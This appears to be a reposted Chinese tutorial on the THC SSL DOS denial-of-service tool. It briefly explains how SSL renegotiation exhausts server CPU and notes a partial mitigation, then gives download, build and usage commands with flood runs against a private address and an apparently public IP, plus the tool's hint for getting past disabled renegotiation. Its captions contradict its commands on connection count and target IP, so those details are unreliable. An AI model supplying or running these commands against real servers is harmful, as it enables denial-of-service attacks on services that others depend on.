德国黑客组织 "The Hacker's Choice" 发布了工具 THC SSL DOS, 与传统 DDoS 工具不同的是, 只需要一台执行单一攻击的电脑就能迅速消耗服务器资源, 造成服务器拒绝服务. 这个攻击方式的本质是消耗服务器的 CPU 资源, 在协商加密算法的时候服务器 CPU 的开销是客户端的 15 倍左右. 而 Renegotiating 机制让攻击者可以在一个 TCP 连接中不停的快速重新协商, 如果建立多个连接则服务端的压力更为可怕, 而且这种攻击建立的连接数很少导致难以被察觉. 从漏洞形成原因中, 我们看到 Renegotiating 机制可以让攻击者在一个 TCP 连接中不停的快速重新协商, 由此可知, 我们可以通过禁用 Renegotiating 机制来实现延缓此类拒绝攻击. 但是其只能相对延缓, 仍然不能彻底解决问题. 如果通过客户端模拟多次请求连接, 则依然会出现服务器端消耗资源过大的情况. 由于德国黑客组织提供的工具 THC SSL DOS 目前只针对 Renegotiations Enabled 的情况.
0x01 下载安装
- wget https://github.com/vanhauser-thc/THC-Archive/blob/master/Exploits/thc-ssl-dos-1.4.tar.gz
- tar zxvf thc-ssl-dos-1.4.tar.gz
- cd thc-ssl-dos-1.4
- ./configure && make
- # 使用帮助
- root@kali:~# thc-ssl-dos -h
- ______________ ___ _________
- \__ ___/ | \ \_ ___ | | / ~ \/ \ \/
- | | \ Y /\ \____
- |____| \___|_ / \______ /
- \/ \/
- http://www.thc.org
- Twitter @hackerschoice
- Greetingz: the french underground
- ./thc-ssl-dos [options]
- -h help
- -l Limit parallel connections [default: 400]
0x02 使用示例
使用 100 连接 (-l 100), 对目标 IP(192.168.1.208) 及其端口 (443) 进行泛洪攻击.
- root@kali:~# thc-ssl-dos -l 500 192.168.1.208 443 --accept
- \__ ___/ | \ \_ ___ | | / ~ \/ \ \/
- | | \ Y /\ \____
- |____| \___|_ / \______ /
- \/ \/
- http://www.thc.org
- Twitter @hackerschoice
- Greetingz: the french underground
- Waiting for script kiddies to piss off................
- The force is with those who read the source...
- Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
- Handshakes 2 [2.90 h/s], 6 Conn, 0 Err
- Handshakes 25 [22.42 h/s], 13 Conn, 0 Err
- Handshakes 70 [43.97 h/s], 20 Conn, 0 Err
- Handshakes 125 [56.51 h/s], 27 Conn, 0 Err
- Handshakes 185 [62.09 h/s], 33 Conn, 0 Err
- Handshakes 262 [74.56 h/s], 41 Conn, 0 Err
- Handshakes 365 [104.93 h/s], 47 Conn, 0 Err
- Handshakes 496 [131.23 h/s], 54 Conn, 0 Err
使用 100 连接 (-l 100), 对目标 IP(111.13.101.208) 及其端口 (443) 进行泛洪攻击.
- root@kali:~# thc-ssl-dos -l 500 183.222.100.112 443 --accept
- ______________ ___ _________
- \__ ___/ | \ \_ ___ | | / ~ \/ \ \/
- | | \ Y /\ \____
- |____| \___|_ / \______ /
- \/ \/
- http://www.thc.org
- Twitter @hackerschoice
- Greetingz: the french underground
- Waiting for script kiddies to piss off................
- The force is with those who read the source...
- Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
- ERROR: Target has disabled renegotiations.
- Use your own skills to modify the source to test/attack
- the target [hint: TCP reconnect for every handshake].
来源: http://www.bubuko.com/infodetail-2868876.html